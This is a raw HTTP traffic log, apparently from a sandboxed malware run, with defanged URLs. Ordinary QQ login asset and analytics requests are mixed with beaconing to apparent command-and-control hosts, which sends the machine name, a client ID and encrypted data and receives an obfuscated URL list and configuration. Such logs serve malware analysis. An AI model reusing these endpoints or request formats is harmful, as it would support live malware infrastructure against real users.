User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:57 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1741
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:02 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 377
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:02 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7016
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /cgi-bin/qlogin HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sun, 28 Dec 2014 21:56:43 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=-301604341; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Mon, 22 Dec 2014 01:30:00 GMT
Content-type: text/html
Content-Length: 5305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-height:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style><script>var g_begTime=new Date();..(function(){...window.onerror = function(msg,url,line){....var t = document.createElement('
<<< skipped >>>
GET /web/get_ad4.asp?type=loadall&machinename=XP9-A8A67A25&cr=yes HTTP/1.1
Accept: */*
Referer:
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Host: VVV.it885.com.cn
Connection: Keep-Alive
Cookie:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 31217
Content-Type: text/html
Expires: Sun, 28 Dec 2014 21:55:56 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDASSAADAB=DICNKOODLOPMEJEDJIGMCOEO; path=/
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:56:55 GMT
<332=$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ3=1 dvu$4$4$117yy....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z3=1 dvu$5$5$7$7$7$7{<1=32$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=277 dvu$4$4$6557mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=277 dvu$5$5$7$7$7$7{<0651$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ6 dvu$7$7$4=10yy....)....)....)....)....)....)....)....)....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ6 dvu$5$5$7$7$7$4{<3324$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ36= dvu$4$4$4562mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z36= dvu$5$5$7$7$7$7{<07=<$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ7 dvu$7$7$00545yy....)....)....)....)....)....)....)....)....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ7 dvu$5$5$7$7$7$4{<1753$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ317 dvu$4$4$4143mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z317 dvu$5$5$7$7$7$7{<06=6$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=047 dvu$4$4$43557mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=047 dvu$5$5$7$7$7$4{<333=$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ360 dvu$4$4$=757mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z360 dvu$5$5$7$7$7$4{<0647$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ1 dvu$7$7$4316yy....)....)....)....)....)....)....)....)....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ1 dvu$5$5$7$7$7$4{<07<=$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ7 dvu$7$7$0054<yy....)....)....)....)....)....)....)....)....yymqq
<<< skipped >>>
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:52 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:57 GMT
Age: 1735
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:52 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7006
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /stat.php?id=4690803&web_id=4690803 HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s6.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 28 Dec 2014 21:57:07 GMT
Last-Modified: Sun, 28 Dec 2014 21:57:07 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache7.l2hk1[62,200-0,M], cache4.l2hk1[62,0], cache3.us1[389,200-0,M], cache1.us1[390,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Sun, 28 Dec 2014 21:57:07 GMT
X-Swift-CacheTime: 5400
b4a..(function(){function k(){this.c="4690803";this.R="z";this.N="";this.K="";this.M="";this.r="1419803827";this.P="hzs9.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=4690803");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;i
<<< skipped >>>
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 327
Cache-Control: no-cache
parems=E5495EE00C5B207C93D363C4EACEBE4C1A8F4039E423912CB1985A0EBBE0B468BF078156EA46E4AD10CD2896738052C1C9F9C611E1FF157D25C5D33BBC2D2BFC5D9461BE8F036797D775F43ED496B4EBD22CE5C4E52A84690B63FABE01698C3C4A557FCE382F121BEAB949348F326EAA836219672ECEBC79B7870349A02BCDDFA66ACC875E58357D679885F1500CEC8690CEDE6FD2390128730533516DD3F5AC
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 128
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:05 GMT
D62863FAE68B8607704484A6A04125491C77642904F91F9D9403A3D6653CC634BD718A92BB0F031A48F9B8942A7083006C6D6B1D918F78795FE9C19470E68ACF....
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 167
Cache-Control: no-cache
parems=2432928EC233CF1BE823ED4456E8F82B777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF19AF5B126F7E96641757E723256467E1BF7D301DE01B02C3D4024F79AC3D8754C
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:26 GMT
32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928..
GET /core.php?web_id=4690803&t=z HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 750
Connection: keep-alive
Date: Sun, 28 Dec 2014 21:51:27 GMT
Last-Modified: Sun, 28 Dec 2014 21:51:27 GMT
Expires: Sun, 28 Dec 2014 22:06:27 GMT
Via: cache36.l2ot7[0,200-0,H], cache44.l2ot7[0,0], cache6.us1[10,200-0,M], cache1.us1[11,0]
Age: 340
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Sun, 28 Dec 2014 21:57:07 GMT
X-Swift-CacheTime: 560
!function(){var p,q,r,a=encodeURIComponent,b="4690803",c="",d="",e="online_v3.php",f="hzs9.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:07 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1751
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:12 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1756
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:17 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:44 GMT
Age: 393
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:17 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7031
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /9.gif?abc=1&rnd=127307938 HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Sun, 28 Dec 2014 21:57:08 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=tGonDZSqqmQCAbhrJibBL0IA; expires=Wed, 25-Dec-24 21:57:08 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=3544e6db; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=886b338694b5dbddafd164ce_1419803828; expires=Wed, 25-Dec-24 21:57:08 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=tGonDZSqqmQCAbhrJibBL0IA
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;..
GET /ic.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: 1111.ip138.com
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:58:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 218
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAAASSCBR=AOBLCGDDPBIHEDGDCFKKMDHL; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....["%local server IP%"] ............</center></body></html>..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:45 GMT
Server: PWS/8.1.20.9
X-Px: rf-ms h0-s2078.p9-jfk ( h0-s2050.p9-jfk), ht h0-s2050.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1729
Content-Length: 7856
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89as.r.................................................^....A...................! ............B.....}....................1)-t....................j...........................................................c..>..p[E............z...........q.....u.....j.........................................Z.................b..................................................^................................!.......,....s.r.....'..........X......'...............................X.............................X......................................)....Fz%.K.1.......*\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\....... ^......#K.L.....3C..w..................@...c.....k..g....v.......|....q ..{.....K...te...k..0...'....F......_.........O..............z....B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8....;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*....j.............".....j..<........... ....k...&....6...MD m...X...8....L.....;m.........n....n........ko...................0..$....7....G,....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|....}..w...>.............G....W....d....w.y......].`..80 6.............n............../....o|..$..........Q..U...GF0....w...../.....o.............3 ....a..X.!A!K.....0...@......L......:......'H..Z.......
<<< skipped >>>
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:45 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 6999
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /xc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: wangbao.6299.cc
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:07 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
Last-Modified: Sun, 30 Nov 2014 07:25:47 GMT
Accept-Ranges: bytes
ETag: "f68f7cdc6ecd01:0"
X-Server: Zm9zaGFuMDEtY2RuMTQuZmhs
X-Cache: pass
1:1..
POST /GetData.asp HTTP/1.1
Referer: hXXp://VVV.baidu.com/s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Content-Type: application/x-www-form-urlencoded;
Host: 1.rwdns.com
Content-Length: 44
Cache-Control: no-cache
SN=ClientSetOnlineV6&SP='YSVC082501-7204244'
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 3
Content-Type: text/html; Charset=GB2312
Set-Cookie: ASPSESSIONIDCSRTRSQB=EOHLPBHDNHBAGLHMPFAICOBF; path=/
Cache-control: private
120....
POST /SetData.asp HTTP/1.1
Referer: hXXp://VVV.baidu.com/s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Content-Type: application/x-www-form-urlencoded;
Host: 1.rwdns.com
Content-Length: 63
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSRTRSQB=EOHLPBHDNHBAGLHMPFAICOBF
SN=ClientSetV6DomainToIp&SP='180.76.3.151','YSVC082501-7204244'
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1
